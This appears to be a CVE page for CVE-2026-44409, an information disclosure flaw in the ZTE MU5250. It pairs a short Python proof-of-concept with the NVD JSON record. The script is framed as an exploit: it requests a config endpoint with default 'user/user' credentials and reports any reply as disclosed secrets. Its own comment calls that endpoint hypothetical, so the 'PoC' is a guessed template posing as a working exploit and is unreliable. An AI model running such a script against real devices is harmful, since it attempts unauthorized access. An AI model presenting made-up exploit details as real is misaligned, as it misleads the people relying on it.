CVE-2026-44409

import requests # CVE-2026-44409 PoC Example # Target: ZTE MU5250 # Description: Exploits improper access control to disclose sensitive info. target_ip = "192.168.0.1" # Replace with actual target IP url = f"http://{target_ip}/api/v1/system/config" # Hypothetical sensitive endpoint username = "user" # Low privilege user password = "user" try: # Send request with low privilege credentials response = requests.get(url, auth=(username, password), timeout=10) if response.status_code == 200: print("[+] Vulnerability Exploited Successfully!") print("[+] Sensitive Information Disclosed:") print(response.text) else: print(f"[-] Exploit failed. Status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-44409", "sourceIdentifier": "[email protected]", "published": "2026-05-22T05:16:26.350", "lastModified": "2026-05-22T05:16:26.350", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is an an information disclosure vulnerability in ZTE MU5250. Due to improper configuration of the access control mechanism, attackers can obtain information without authorization, causing the risk of information disclosure."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/3711746568357343342", "source": "[email protected]"}]}}